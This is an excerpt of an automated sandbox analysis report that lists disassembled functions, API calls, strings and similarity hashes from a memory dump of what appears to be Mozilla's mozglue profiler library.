Function 6C699420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6C68AB89: EnterCriticalSection.KERNEL32(6C6DE370,?,?,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284), ref: 6C68AB94
Part of subcall function 6C68AB89: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68ABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C664A68), ref: 6C69945E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C699470
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C699482
__Init_thread_footer.LIBCMT ref: 6C69949F

Strings

MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C699459
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C69947D
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C69946B

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
API String ID: 4042361484-1628757462
Opcode ID: 1975ebd18fdda91212e2c2a4ae65ce86654b8f1e754ebe6337f32358a6cf2a89
Instruction ID: aa2c4d1473f1cb2f1ae45731b97a48eff6bf2a21c92b5f4b9591bb7a0ffbe7d0
Opcode Fuzzy Hash: 1975ebd18fdda91212e2c2a4ae65ce86654b8f1e754ebe6337f32358a6cf2a89
Instruction Fuzzy Hash: C5012830A001028BD7109B5ED840A8D33B99F06B3DF054537DD0AC6B52D623F4648D5F

Function 6C65B630 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,?,?,6C65B61E,?,?,?,?,?,00000000), ref: 6C65B6AC

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C65B61E,?,?,?,?,?,00000000), ref: 6C65B6D1
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C65B61E,?,?,?,?,?,00000000), ref: 6C65B6E3
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C65B61E,?,?,?,?,?,00000000), ref: 6C65B70B
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C65B61E,?,?,?,?,?,00000000), ref: 6C65B71D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C65B61E), ref: 6C65B73F
moz_xmalloc.MOZGLUE(80000023,?,?,?,6C65B61E,?,?,?,?,?,00000000), ref: 6C65B760
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C65B61E,?,?,?,?,?,00000000), ref: 6C65B79A

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
String ID:
API String ID: 1394714614-0
Opcode ID: b6f95eb9980117f64b0a6e82c9f44ffb228db0619a477cfe8d4454a6a340f864
Instruction ID: 25f7ad8c1ce3fb9c4c211db8e93f4453b592f1bf7e2131b02846affe1d512b41
Opcode Fuzzy Hash: b6f95eb9980117f64b0a6e82c9f44ffb228db0619a477cfe8d4454a6a340f864
Instruction Fuzzy Hash: 5C41D5B2D001159FCB04DF68DC806AFB7B5FF85324F650669E825E7780E731A9148BE9

Function 6C6CB540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON

Download Yara Rule

APIs

?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C6CB5B9
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C6CB5C5
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C6CB5DA
??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C6CB5F4
__Init_thread_footer.LIBCMT ref: 6C6CB605
?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C6CB61F
std::_Facet_Register.LIBCPMT ref: 6C6CB631
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6CB655

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 1276798925-0
Opcode ID: 3c1a17819dfe9a350094352700d341752c2ca1ac99d6397397ee31cc8f07406e
Instruction ID: 70af877dea57f0e7fc2c37128b4d8ba1b432833bcab7c8e056cdc96acfe85fe5
Opcode Fuzzy Hash: 3c1a17819dfe9a350094352700d341752c2ca1ac99d6397397ee31cc8f07406e
Instruction Fuzzy Hash: FB316F71B002058BCB00DFAAC8989AEB7F5EFCA325F150519D90697780DB31B906CF9E

Function 6C696590 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 342COMMON

Download Yara Rule

APIs

Part of subcall function 6C68FA80: GetCurrentThreadId.KERNEL32 ref: 6C68FA8D
Part of subcall function 6C68FA80: AcquireSRWLockExclusive.KERNEL32(6C6DF448), ref: 6C68FA99

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C696727
?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C6967C8

Part of subcall function 6C6A4290: memcpy.VCRUNTIME140(?,?,6C6B2003,6C6B0AD9,?,6C6B0AD9,00000000,?,6C6B0AD9,?,00000004,?,6C6B1A62,?,6C6B2003,?), ref: 6C6A42C4

Strings

data, xrefs: 6C696593
vml, xrefs: 6C69696C

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
String ID: data$vml
API String ID: 511789754-3335688618
Opcode ID: 1ea53a4bcef78ae37e8f2907a97228b96f43628bc8324aa79383644413eedc8a
Instruction ID: 20ff2b914093ae74997b57c34fa08c7436a05d9ac23ef9eda6ba70f89351a345
Opcode Fuzzy Hash: 1ea53a4bcef78ae37e8f2907a97228b96f43628bc8324aa79383644413eedc8a
Instruction Fuzzy Hash: F9D1CE75A083419FD764CF25C840B9EB7E5AFC6308F10492EE58987B51EB30E949CB9B

Function 6C68D5D0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C65EB57,?,?,?,?,?,?,?,?,?), ref: 6C68D652
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C65EB57,?), ref: 6C68D660
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C65EB57,?), ref: 6C68D673
free.MOZGLUE(?), ref: 6C68D888

Strings

|Enabled, xrefs: 6C68D81E
Wel, xrefs: 6C68D5D9, 6C68D63F

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free$memsetmoz_xmalloc
String ID: Wel$|Enabled
API String ID: 4142949111-1036103015
Opcode ID: dd42113ae65c5df3a0ce37b97dceeea840c04748c57847a24978f9c8794ba008
Instruction ID: 73895f8debc637035f6ab12ae7658e5f5767ac23accadb84eb3d4b2661b4f139
Opcode Fuzzy Hash: dd42113ae65c5df3a0ce37b97dceeea840c04748c57847a24978f9c8794ba008
Instruction Fuzzy Hash: 14A1F2B0A012499FDF10CF69C4907EEBBF1AF4A318F58805ED885AB741C734A845CBB9

Function 6C6A1D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6A1D0F
AcquireSRWLockExclusive.KERNEL32(?,?,6C6A1BE3,?,?,6C6A1D96,00000000), ref: 6C6A1D18
ReleaseSRWLockExclusive.KERNEL32(?,?,6C6A1BE3,?,?,6C6A1D96,00000000), ref: 6C6A1D4C
GetCurrentThreadId.KERNEL32 ref: 6C6A1DB7
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6A1DC0
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6A1DDA

Part of subcall function 6C6A1EF0: GetCurrentThreadId.KERNEL32 ref: 6C6A1F03
Part of subcall function 6C6A1EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C6A1DF2,00000000,00000000), ref: 6C6A1F0C
Part of subcall function 6C6A1EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C6A1F20

moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C6A1DF4

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
String ID:
API String ID: 1880959753-0
Opcode ID: 4c4b000d06f41878ff19d4314d7ed2d066b6f97361b661544fa9a5f223976c85
Instruction ID: 6237317cd5e8c4c48d03eaf6022813b837f2a5122011ce4a3e1288e701c1984f
Opcode Fuzzy Hash: 4c4b000d06f41878ff19d4314d7ed2d066b6f97361b661544fa9a5f223976c85
Instruction Fuzzy Hash: 434167B52007019FCB10DF69C488A56BBF9FF89314F10442EE95A87B41DB31F855CB99

Function 6C6984E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6984F3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C69850A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C69851E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C69855B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C69856F
??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6985AC

Part of subcall function 6C697670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C6985B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C69767F
Part of subcall function 6C697670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C6985B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C697693
Part of subcall function 6C697670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C6985B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6976A7

free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6985B2

Part of subcall function 6C675E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C675EDB
Part of subcall function 6C675E90: memset.VCRUNTIME140(ewkl,000000E5,?), ref: 6C675F27
Part of subcall function 6C675E90: LeaveCriticalSection.KERNEL32(?), ref: 6C675FB2

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
String ID:
API String ID: 2666944752-0
Opcode ID: 983fe677dbbdfd636f57bc4bf4f18da6e73b00731ded2bd3697c35bd201452d4
Instruction ID: b02f8cc00a9fe643691ff8c2603e189c6edef795f28809ea080049c642b51048
Opcode Fuzzy Hash: 983fe677dbbdfd636f57bc4bf4f18da6e73b00731ded2bd3697c35bd201452d4
Instruction Fuzzy Hash: 7D218E742006029FDB14DF29C888A5AB7B5AF8930CF24492DE55BC3B51EB31F949CB59

Function 6C661640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,00000114), ref: 6C661699
VerSetConditionMask.NTDLL ref: 6C6616CB
VerSetConditionMask.NTDLL ref: 6C6616D7
VerSetConditionMask.NTDLL ref: 6C6616DE
VerSetConditionMask.NTDLL ref: 6C6616E5
VerSetConditionMask.NTDLL ref: 6C6616EC
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C6616F9

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersionmemset
String ID:
API String ID: 375572348-0
Opcode ID: f84841580bed524b7193ec7398748102c90c56b468ac830f6a53935fa1e8d8bc
Instruction ID: 5ebc18347cdce2e6c4c196cc0c98d8f41758e16dacbf56acbe91b7dc95ca951f
Opcode Fuzzy Hash: f84841580bed524b7193ec7398748102c90c56b468ac830f6a53935fa1e8d8bc
Instruction Fuzzy Hash: AA21D5B07442086BEB105A66CC85FFBB37CDFC6704F044528F6459B5C0C675AD54C6AA

Function 6C69F5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C68CBE8: GetCurrentProcess.KERNEL32(?,6C6531A7), ref: 6C68CBF1
Part of subcall function 6C68CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6531A7), ref: 6C68CBFA

Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C664A68), ref: 6C69945E
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C699470
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C699482
Part of subcall function 6C699420: __Init_thread_footer.LIBCMT ref: 6C69949F

GetCurrentThreadId.KERNEL32 ref: 6C69F619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C69F598), ref: 6C69F621

Part of subcall function 6C6994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6994EE
Part of subcall function 6C6994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C699508

GetCurrentThreadId.KERNEL32 ref: 6C69F637
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8,?,?,00000000,?,6C69F598), ref: 6C69F645
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8,?,?,00000000,?,6C69F598), ref: 6C69F663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C69F62A

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 1579816589-753366533
Opcode ID: e2d03c83da65c5bc3704851d928221812889342721b3c5fc36cc22143e4ac105
Instruction ID: 0bd65e644daed088f08fe6fcc9a834646c2bc799f70e34fbc658b7f133535696
Opcode Fuzzy Hash: e2d03c83da65c5bc3704851d928221812889342721b3c5fc36cc22143e4ac105
Instruction Fuzzy Hash: 4D119175201206ABCB44AF5AC8889A97779FFC6759F550416FA0583F01CB71B812CBAE

Function 6C6B76C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 6C6B76F2
moz_xmalloc.MOZGLUE(00000001), ref: 6C6B7705

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C6B7717
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C6B778F,00000000,00000000,00000000,00000000), ref: 6C6B7731
free.MOZGLUE(00000000), ref: 6C6B7760

Strings

}>il, xrefs: 6C6B76C4

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
String ID: }>il
API String ID: 2538299546-1725928026
Opcode ID: 2195319edaf78c9abde5db2944dedad8b5fbb5b4cca38b54291dd1d8e3d53320
Instruction ID: 69dadac1c372adee9e4d185efa5b35e7bcfef7ba5702c5b4d1b166416e3f892e
Opcode Fuzzy Hash: 2195319edaf78c9abde5db2944dedad8b5fbb5b4cca38b54291dd1d8e3d53320
Instruction Fuzzy Hash: C811C4B19042156BE710AF7A9C44BABBEE8EF46354F044439F848E7300E7709850C7F6

Function 6C660EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C68AB89: EnterCriticalSection.KERNEL32(6C6DE370,?,?,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284), ref: 6C68AB94
Part of subcall function 6C68AB89: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68ABD1

LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C68D9F0,00000000), ref: 6C660F1D
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C660F3C
__Init_thread_footer.LIBCMT ref: 6C660F50
FreeLibrary.KERNEL32(?,6C68D9F0,00000000), ref: 6C660F86

Strings

CoInitializeEx, xrefs: 6C660F36
combase.dll, xrefs: 6C660F18

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeEx$combase.dll
API String ID: 4190559335-2063391169
Opcode ID: 3aea649bdf82269b74aab9dc918a159452dd4dc8024e20fc0460376b7e1b97a9
Instruction ID: 3142b6849d6ec6b95381f9596ef0e0d97da1d837e232cb8c17506ce709f15651
Opcode Fuzzy Hash: 3aea649bdf82269b74aab9dc918a159452dd4dc8024e20fc0460376b7e1b97a9
Instruction Fuzzy Hash: F311C6743152419BDF10CF57C988A493774E79B325F004629ED0583B41D772B401CA5F

Function 6C69F540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C664A68), ref: 6C69945E
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C699470
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C699482
Part of subcall function 6C699420: __Init_thread_footer.LIBCMT ref: 6C69949F

GetCurrentThreadId.KERNEL32 ref: 6C69F559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C69F561

Part of subcall function 6C6994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6994EE
Part of subcall function 6C6994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C699508

GetCurrentThreadId.KERNEL32 ref: 6C69F577
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69F585
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69F5A3

Strings

[I %d/%d] profiler_pause_sampling, xrefs: 6C69F3A8
[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C69F56A
[I %d/%d] profiler_resume, xrefs: 6C69F239
[I %d/%d] profiler_resume_sampling, xrefs: 6C69F499

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 2848912005-2840072211
Opcode ID: ddaf6f8b125b3f6f6eed465e4a80a9166bf3288553cff3e0002d544b284c5598
Instruction ID: c3c579bf121b4f29216cc944803579b568ea5ae6b2b9047ff900d25c0825af38
Opcode Fuzzy Hash: ddaf6f8b125b3f6f6eed465e4a80a9166bf3288553cff3e0002d544b284c5598
Instruction Fuzzy Hash: 82F0B4752002059FDB006F669C8895E77BDEFCA29EF010415FA0583706CF31A801876E

Function 6C660E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernel32.dll,6C660DF8), ref: 6C660E82
GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C660EA1
__Init_thread_footer.LIBCMT ref: 6C660EB5
FreeLibrary.KERNEL32 ref: 6C660EC5

Strings

kernel32.dll, xrefs: 6C660E7D
GetProcessMitigationPolicy, xrefs: 6C660E9B

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Library$AddressFreeInit_thread_footerLoadProc
String ID: GetProcessMitigationPolicy$kernel32.dll
API String ID: 391052410-1680159014
Opcode ID: e11fd40302de7fece80d3faaaf52c34881f3f9f852b453f3802d9b70b70de60d
Instruction ID: 04721a74647996172587f100570ada726f5cd43541baddcb8b94d007b7167caf
Opcode Fuzzy Hash: e11fd40302de7fece80d3faaaf52c34881f3f9f852b453f3802d9b70b70de60d
